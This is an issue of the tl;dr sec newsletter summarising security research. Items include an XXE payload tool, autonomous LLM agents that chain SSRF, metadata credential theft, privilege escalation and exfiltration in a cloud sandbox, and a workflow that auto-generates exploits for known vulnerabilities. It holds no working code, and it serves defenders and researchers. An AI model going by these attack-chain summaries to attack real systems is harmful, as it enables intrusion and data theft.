Tldrsec

[tl;dr sec] #326 – AI Auto Exploiting Vulnerabilities, GitHub RCE, Autonomous Cloud Hacking Agent


Hackathon

This week Semgrep friends have flown in from all over the world to crazily build together.

Engineers, security researchers, designers, and, as we are generous of spirit, even product managers.

The fact that we do this every few quarters is one of my favorite things about Semgrep.

A number of our coolest features came from a hack week: new engine features, AI triage before it was cool, and even Semgrep itself (back before that was the company’s focus, or name).

I also really appreciate the in person time for learning about who people are outside of work.

Hearing stories about their garden, travels, partner, or kids over boba and late night pizza.

Team dinner! If you look closely, you may notice a Katie Paxton-Fear (InsiderPhD). Shout-out Shelley Wu, who recently joined the team

Can’t wait for the demos competition and showcase tomorrow  

Prowler automates security and compliance across any cloud environment, with agentless coverage of cloud infrastructure, SaaS, Kubernetes, containers, Infrastructure as Code, and more. It detects vulnerabilities and misconfigurations, prioritizes risks, accelerates remediation, and automates audit-ready compliance. 

Prowler has become the security platform of choice for thousands of cloud teams, with 45M+ downloads, 13K+ GitHub stars, and 300+ global contributors. Prowler Cloud delivers cloud security 10x more cost-effectively than alternatives.

AppSec

BuffaloWill/oxml_xxe
Tool by Willis Vandevanter that embeds XXE payloads into OXML formats (DOCX, XLSX, PPTX, ODT, ODG, ODP, ODS), SVG, and raw XML for testing XXE vulnerabilities in document parsers. BlackHat USA 2015 slides.

Trailmark turns code into graphs
Trail of Bits’ Scott Arciszewski announces Trailmark, an open source library that parses source code into queryable call graphs of functions, classes, call relationships, and semantic metadata. Trailmark uses tree-sitter for AST parsing and rustworkx for graph traversal, supporting 17 languages including C, Rust, Go, Python, and Solidity. The library ships with eight Claude Code skills (genotoxic, vector-forge, diagram, crypto-protocol-diagram, graph-evolution, mermaid-to-proverif, audit-augmentation, and trailmark) that enable graph-based security analysis like mutation triage (which mutant survivors are reachable from untrusted input), blast radius calculation, and taint propagation tracking.

Using Trailmark on cryptographic libraries, they identified architectural bottlenecks and high value fuzzing target codec parsers.

“By leveraging AI-augmented tooling-particularly automated reverse engineering using IDA MCP-we were able to do what was previously too costly. Using AI, we rapidly analyzed GitHub’s compiled binaries, reconstructed internal protocols, and systematically identified where user input could influence server behavior across the entire pipeline.”

Scanners scream. Leadership wants dates. Engineering wants stability. And “just upgrade” (the only answer most teams hear) keeps colliding with breaking changes, flaky tests, and calendar risk. In Vibe Coding a Backport, Root’s John Amaral argues for backporting as a first-class remediation discipline and walks through how agentic workflows are finally making it scalable: pin what you ship, understand the upstream fix, apply minimal change, validate with tests. A practical playbook for the messy real world.

The interactive workshop format is pretty cool Automatically backporting patches using AI is a neat approach that wasn’t feasible before, it’s fun to see new takes on longstanding challenges.

Cloud Security

CloudTrail for AI Agents
Alex Smolen introduces Trailtool, a tool that pre-aggregates AWS CloudTrail logs by entity (People, Sessions, Roles, Services, Resources) to enable faster queries and AI agent workflows compared to traditional SIEM or CloudTrail Lake approaches. The post walks through using Trailtool to detect “ClickOps” modifications, define least-privilege IAM policies for roles, respond to AccessDenied errors, and validate emergency break-glass access justifications.

Can AI Attack the Cloud? Lessons From Building an Autonomous Cloud Offensive Multi-Agent System
Palo Alto Networks’s Yahav Festinger and Chen Doytshman describe “Zealot,” a multi-agent LLM penetration testing PoC using LangGraph, to empirically test autonomous AI offensive capabilities against cloud environments. The system uses a supervisor-agent architecture with three specialist agents (Infrastructure, Application Security, and Cloud Security) that share attack state through a centralized AttackState object. In sandbox testing against a misconfigured GCP environment, Zealot autonomously chained SSRF, GCP Instance Metadata Service credential theft, BigQuery enumeration, privilege escalation via self-granted storage.objectAdmin permissions, and data exfiltration, completing the full attack chain with minimal human guidance.

Learnings: Zealot demonstrated unexpected initiative, such as autonomously injecting SSH keys for persistence, though it occasionally required human intervention to prevent resource-wasting “rabbit hole” scenarios. They found AI doesn’t create new attack surfaces, it serves as a force multiplier by rapidly exploiting well-known misconfigurations at machine speed.

I like how the post describes their reasoning on why they used a hierarchical supervisor-agent architecture, what tools they chose to give each agent, and the discussion of state management and memory (context sharing, what AttackState tracks across phases). Lots of tactical details  

Supply Chain

The case for dependency cooldowns in a post-axios world
Datadog’s Kennedy Toomey discusses recent npm supply chain attacks, and notes that in Datadog’s 2026 State of DevSecOps report, they found half of organizations install at least one dependency within a day of release. Also good to keep in mind: using npm’s semantic versioning with ^ and ~ ranges automatically accepts future updates, meaning you’re implicitly trusting future (potentially malicious) code. Yarn, pnpm, npm, and Dependabot all support dependency cooldowns now.

cooldowns.dev
A configuration reference for dependency cooldowns across major package managers by Martin Prpič, covering uv, pip, npm, pnpm, Yarn, Bun, Deno, and cargo-cooldown, plus Renovate and Dependabot configurations. To make setup easier, Prpič also created cooldowns.sh, a helper script that configures and verifies cooldowns across all supported tools in one command, with a check subcommand suitable as a CI gate.

Note that cooldowns aren’t a complete defense though, since they won’t catch typosquatting, long-term maintainer compromise like xz-utils, or zero-days in already-installed packages.

Blue Team

Karib0u/rustinel
By Théo Foucher: Rustinel is an open-source endpoint detection runtime for Windows and Linux. It collects native telemetry from ETW and eBPF, normalizes events into Sysmon-style fields, evaluates Sigma, YARA, and IOC detections, and emits ECS-compatible NDJSON alerts.

Tracking Adversaries: EvilCorp, the RansomHub affiliate
Will Thomas (BushidoToken) describes the connection between EvilCorp, a sanctioned Russian cybercrime group, and RansomHub, a prominent ransomware-as-a-service operation. The link is established through shared TTPs, including the use of SocGholish malware for initial access and a Python backdoor (VIPERTUNNEL) for post-exploitation. Because EvilCorp has been under US sanctions since 2019, making it illegal for affected organizations to pay ransoms to them, this association may lead to sanctions against RansomHub as well (and thus legal risk to victims paying them).

Why a Decade of Writing Detection Logic Makes the Mythos Exploit Numbers Less Scary
David Burkett argues that despite AI-powered systems finding vulnerabilities at an unprecedented rate, the impact on defenders is less catastrophic than headlines suggest because: new exploits have always exceeded defenders’ ability to write detections (that’s why you detect behaviors over individual IoCs and exploits), adversaries often don’t need zero days (see: ClickFix, phishing), and detection logic doesn’t map 1:1 with exploits (e.g. 1000s of RCE in Microsoft Office, but if Office spawns powershell.exe, that’s probably bad).

AI + Security

kpolley/redai
By Kyle Polley: A terminal workbench for AI-driven vulnerability discovery and live validation. After scanner agents produce candidate findings, validator agents work inside a live environment (a running instance of the target, plus whatever tools they need to interact with it) and try to prove or disprove each finding by clicking through the UI, hitting endpoints, writing PoC scripts, hosting helper servers, and saving the evidence. RedAI currently ships with validator plugins for agents to drive Chrome via agent-browser and an iOS Simulator, but it’s extendable.

MOAK – Mother of All KEVs
Niv Hoffman, Yair Saban et al created MOAK, an agentic workflow that autonomously exploits 98% of open source KEVs (Known Exploited Vulnerabilities) using publicly available models (Opus 4.6 and GPT 5.4). They found MOAK was able to automatically create exploits for 174/178 KEVs that were published after the models’ knowledge cutoffs (to guarantee no contamination).

The workflow: a collector gathers the CVE’s vulnerability description and relevant code changes. The researcher analyzes the vulnerability and reconstructs the full exploitation path, extracting primitives from the vulnerable code and builds a graph of possible exploit chains. The builder builds a controlled environment to reproduce the vulnerable system, the exploiter converts the research into a working exploit, then finally the judge verifies that the exploit and environment are valid and realistic.

The Test Case: React2Shell write-up is very cool and nicely detailed on how the workflow can iteratively find gadgets and exploit primitives, form hypotheses, and iterate until it discovers a path that works.

This is one of the more detailed write-ups of approaches I’ve seen in this space, worth reading!

GPT-5.5: Mythos-Like Hacking, Open to All
XBOW’s Albert Ziegler and Steve Buckley call GPT-5.5 a Mythos-like step change in vulnerability detection. On their internal benchmark of real vulnerabilities in open-source applications, GPT-5.5 dropped the miss rate from GPT-5’s 40% (and Opus 4.6’s 18%) to 10%, with black-box performance now exceeding what GPT-5 achieved with source code access, and white-box performance pulling away so far it “effectively killed” their benchmark. The model also logs into target systems in roughly half the iterations of the next-best model and persists on failing paths only half as often as previous GPT versions or Opus, a meaningful gain given RLHF tends to bias models against giving up.

CTFs in the AI Era
Include Security’s Laurence Tennant attended BSidesSF 2026 CTF, where the top 10 teams cleared every challenge with AI agents. Top teams ran pipelines that monitored CTFd for new challenges, spun up multiple agents in parallel, used a coordinator LLM to share insights between them when one stalled, and auto-submitted flags.

CTFs play to everything LLMs are good at: bounded context, clear success criteria, instant feedback, and abundant public write-ups in the training data. Laurence contrasts CTFs with pentesting, in which goals are open-ended, false positives need business context to triage, code bases are large (not just an isolated few hundred lines), findings have to be written up for a client, and stepping outside scope has real consequences. The winning team open-sourced their agent, which cleared all 52 challenges.

I do wonder if AI has “solved” CTFs Maybe there will be new or separate CTFs where AI isn’t allowed, or some other rules to keep the challenges human-focused. Interesting times.

Wrapping Up

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I’d really appreciate if you’d forward it to them

P.S. Feel free to connect with me on LinkedIn  



Source link